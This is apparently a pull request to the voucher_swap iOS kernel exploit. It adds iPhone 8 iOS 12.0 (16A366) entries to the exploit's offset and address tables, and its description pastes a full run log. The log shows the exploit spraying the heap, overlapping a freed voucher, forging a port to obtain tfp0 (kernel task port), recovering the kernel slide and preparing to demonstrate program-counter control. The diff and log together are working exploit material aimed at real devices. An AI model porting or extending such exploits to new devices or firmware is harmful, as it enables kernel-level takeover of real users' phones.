### PR TITLE
Was Tested on My iP8 iOS 12.0

### DIFF
--- a/README.MD
+++ b/README.MD
@@ -4,5 +4,5 @@ offsets for those devices:
 
 
 All iPhones (A9+) 12.0-12.1.2
-
 iPad7,5    iOS 12.1.1
+iPhone10,1 (iPhone 8) 12.0 16A366

--- a/voucher_swap/voucher_swap/kernel_call/kc_parameters.c
+++ b/voucher_swap/voucher_swap/kernel_call/kc_parameters.c
@@ -128,6 +128,7 @@ static struct initialization addresses[] = {
 	{ "iPhone11,2", "16C50-16C104", addresses__iphone11_2__16C50  },
 	{ "iPhone10,1", "16B92",        addresses__iphone10_1__16B92  },
     { "iPhone10,1", "16C101",       addresses__iphone10_1__16C101 },
+    { "iPhone10,1", "16A366",       addresses__iphone10_1__16C101 },
     { "iPhone9,2", "16B92",         addresses__iphone9_2__16B92 },
 };
 

--- a/voucher_swap/voucher_swap/parameters.c
+++ b/voucher_swap/voucher_swap/parameters.c
@@ -134,14 +134,15 @@ static struct initialization offsets[] = {
 	{ "iPhone11,*", "16A366-16C104", offsets__iphone11_8__16C50  },
 	{ "iPhone10,3", "16A366-16C104", offsets__iphone11_8__16C50  },
 	{ "iPhone10,6", "16A366-16C104", offsets__iphone11_8__16C50  },
-	{ "iPhone10,1", "16A9366-16C104", offsets__iphone10_1__16B92  },
+    { "iPhone10,1", "16A9366-16C104", offsets__iphone10_1__16B92  },
+    { "iPhone10,1", "16A366", offsets__iphone10_1__16B92  },
 	{ "iPhone10,4", "16A9366-16C104", offsets__iphone10_1__16B92  },
 	{ "iPhone10,2", "16A9366-16C104", offsets__iphone10_1__16B92  },
 	{ "iPhone10,5", "16A9366-16C104", offsets__iphone10_1__16B92  },
     {"iPad7,5", "16C50-16C104", offsets__iphone10_1__16B92 },
     { "iPhone9,*", "16A366-16C104", offsets__iphone10_1__16B92  },
     //Aperently A9 will get tfp0 but wont be able to creat IOAudio2DeviceUserCilent (maybe?) so we will leave the offsets as is for noe
-       { "iPhone8,*", "16A366-16C104", offsets__iphone10_1__16B92  },
+    { "iPhone8,*", "16A366-16C104", offsets__iphone10_1__16B92  },
     
 	{ "*",          "*",            initialize_computed_offsets },
 };


### PR DESCRIPTION
Sleeping for 30 second to avoid un-auth operation.[D] platform: iPhone10,1 16A366
[+] created 1024 pipes
[+] created 8000 ports
[+] sprayed 16777216 bytes to 1024 pipes in kalloc.16384
[+] created 3564 vouchers
[+] sprayed 313211904 bytes to 8 ports in kalloc.1024
[+] stashed voucher pointer in thread
..........................................................................................................................................................................
[+] sprayed 354975744 bytes of OOL ports to 4 ports in kalloc.32768
[+] recovered voucher port 0x2bfb07 for freed voucher
[+] adding references to the freed voucher to change the OOL port pointer
[+] receiving the OOL ports will leak port 0x1ec203
[+] received voucher port 0x2bfb07 in OOL ports
[+] voucher overlapped at offset 0x1ef0
[+] received fake port 0x2bfa07
[+] port is at pipe index 258
[+] got ip_requests at 0xffffffe00402f6e0
[+] fake port is at offset 14784
[+] base port is at 0xffffffe005d779c0
[+] kernel_task is at 0xffffffe0002c5c20
[+] done! port 0x2bfa07 is tfp0
we got tfp0 at: 0x2bfa07
[D] found kernel slide 0x000000000bc00000
[D] allocated kernel buffer at 0xffffffe000054000
[+] about to panic: check the panic log to observe PC+register control
